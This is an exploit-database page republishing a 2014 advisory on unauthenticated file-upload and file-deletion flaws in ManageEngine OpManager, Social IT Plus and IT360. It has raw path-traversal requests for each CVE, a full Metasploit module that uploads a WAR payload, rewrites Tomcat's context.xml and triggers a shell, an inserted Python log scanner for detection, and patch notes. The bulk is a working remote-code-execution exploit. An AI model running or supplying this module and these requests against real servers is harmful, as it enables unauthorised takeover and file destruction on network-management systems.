ManageEngine OpManager / Social IT Arbitrary File Upload Exploit

Author: Pedro Ribeiro
Published: Oct 01, 2014
Source: 0day.today (1337DAY-ID-22712)
EPSS: 0.963 (High), percentile 99.4%

Exploit for java platform in category remote exploits

>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security
==========================================================================

>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation."

"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly."

"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."


>> Technical details:
#1
Vulnerability: Remote code execution via WAR file upload
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360

a)
CVE-2014-6034
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war
Affected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; IT360 v? to v10.4
A Metasploit module that exploits this vulnerability has been released.

b)
CVE-2014-6035
POST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war
Affected versions: OpManager v? to v11.3


#2
Vulnerability: Arbitrary file deletion
CVE-2014-6036
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
Affected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 v? to v10.4

POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini
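As an added defender-side example (not part of the advisory or the Metasploit module), the following Python scanner flags the three request patterns above, plus the GET probe the module's check method sends, in a Tomcat/Apache common-format access log. The log lines are constructed samples, and the label strings, regexes and function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints named in the advisory; each maps to one of the three CVEs.
FC_LONG = "/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"
FC_SHORT = "/servlets/FileCollector"
MULTIPART = "/servlets/multipartRequest"
# "../" or "..\" after one URL-decode, plus one level of double encoding.
TRAVERSAL = re.compile(r"\.\.[/\\]|%2e%2e", re.IGNORECASE)
# Apache/Tomcat common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Constructed sample log: the three advisory requests, the module's check probe, one benign line.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2014:10:00:01 +0000] "POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war HTTP/1.1" 200 12
10.0.0.5 - - [01/Oct/2014:10:00:02 +0000] "POST /servlets/FileCollector?AGENTKEY=123&FILENAME=..%2F..%2F..%2Ftomcat%2Fwebapps%2Fwarfile.war HTTP/1.1" 500 0
10.0.0.9 - - [01/Oct/2014:10:00:03 +0000] "POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini HTTP/1.1" 200 5
10.0.0.7 - - [01/Oct/2014:10:01:00 +0000] "GET /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector HTTP/1.1" 405 0
10.0.0.8 - - [01/Oct/2014:10:02:00 +0000] "POST /servlets/multipartRequest?customIcon=upload&fileName=icon.png HTTP/1.1" 200 9
"""

def classify(method, target, status):
    """Return a finding label for one request, or None if it looks benign."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values once
    def val(key):
        return " ".join(qs.get(key, []))
    if path == FC_LONG:
        if method == "GET" and status == 405:
            return "probe: GET to FileCollector answered 405 (the module's check request)"
        if method == "POST" and (TRAVERSAL.search(val("regionID")) or val("FILENAME").lower().endswith(".war")):
            return "CVE-2014-6034: WAR upload via FileCollector regionID traversal"
    if path == FC_SHORT and method == "POST" and (
            TRAVERSAL.search(val("FILENAME")) or val("FILENAME").lower().endswith(".war")):
        return "CVE-2014-6035: WAR upload via FileCollector FILENAME traversal"
    if path == MULTIPART and val("customIcon") == "delete" and TRAVERSAL.search(val("fileName")):
        return "CVE-2014-6036: arbitrary file deletion via multipartRequest"
    return None

def scan_log(text):
    """Return [(source host, label)] for every suspicious line of an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            label = classify(m["method"], m["target"], int(m["status"]))
            if label:
                hits.append((m["host"], label))
    return hits
```

Note that a successful deployment is followed by a GET to a random application name under the webapps root, so a hit here is best correlated with new directories appearing in tomcat/webapps and with the 500/200 responses the module treats as success.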


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
        The vulnerability exists in the FileCollector servlet which accepts unauthenticated
        file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
        version 11.0 of SocialIT for Windows and Linux.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-6034' ],
          [ 'OSVDB', '112276' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 27 2014'))

    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
      'method' => 'GET'
    })

    # A GET request on this servlet returns "405 Method not allowed", which is enough
    # to tell that the servlet is exposed, not that the host is exploitable.
    if res and res.code == 405
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def upload_war_and_exec(try_again, app_base)
    tomcat_path  = '../../../tomcat/'
    servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'

    if try_again
      # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
      # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
      # The file we are uploading has the same content apart from privileged="false" and lots of XML
      # comments.
      # After replacing the context.xml file let's upload the WAR again.
      print_status("#{peer} - Replacing Tomcat context file")
      send_request_cgi({
        'uri'      => normalize_uri(servlet_path),
        'method'   => 'POST',
        'data'     => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},
        'ctype'    => 'application/xml',
        'vars_get' => {
          'regionID' => tomcat_path + "conf",
          'FILENAME' => "context.xml"
        }
      })
    else
      # We need to create the upload directories before our first attempt to upload the WAR.
      print_status("#{peer} - Creating upload directories")
      bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
      send_request_cgi({
        'uri'      => normalize_uri(servlet_path),
        'method'   => 'POST',
        'data'     => rand_text_alphanumeric(4 + rand(32 - 4)),
        'ctype'    => 'application/xml',
        'vars_get' => {
          'regionID' => "",
          'FILENAME' => bogus_file
        }
      })
      register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
    end

    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    print_status("#{peer} - Uploading WAR file...")
    res = send_request_cgi({
      'uri'      => normalize_uri(servlet_path),
      'method'   => 'POST',
      'data'     => war_payload,
      'ctype'    => 'application/octet-stream',
      'vars_get' => {
        'regionID' => tomcat_path + "webapps",
        'FILENAME' => app_base + ".war"
      }
    })

    # The server either returns a 500 error or a 200 OK when the upload is successful.
    if res and (res.code == 500 or res.code == 200)
      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment")
      sleep(datastore['SLEEP'])
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
    end

    print_status("#{peer} - Executing payload, wait for session...")
    send_request_cgi({
      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8) + 8)),
      'method' => 'GET'
    })
  end

  def exploit
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))

    upload_war_and_exec(false, app_base)
    register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")

    # Poll for up to SLEEP seconds; if no session arrives, retry once after
    # replacing context.xml (see upload_war_and_exec).
    sleep_counter = 0
    while not session_created?
      if sleep_counter == datastore['SLEEP']
        print_error("#{peer} - Failed to get a shell, let's try one more time")
        upload_war_and_exec(true, app_base)
        return
      end

      sleep(1)
      sleep_counter += 1
    end
  end
end


>> Fix:
Upgrade to OpManager 11.3, then install the patch from https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix
This patch can be applied to all three applications, but only to the latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).
ManageEngine have indicated that the soon-to-be-released OpManager version 11.4 might not include the fix, as that release is almost ready. They are planning to include the fix in OpManager version 11.5, which should be released sometime in late November or December 2014. No indication was given of when fixed versions of IT360 and Social IT Plus will be released.

#  0day.today [2018-04-02]  #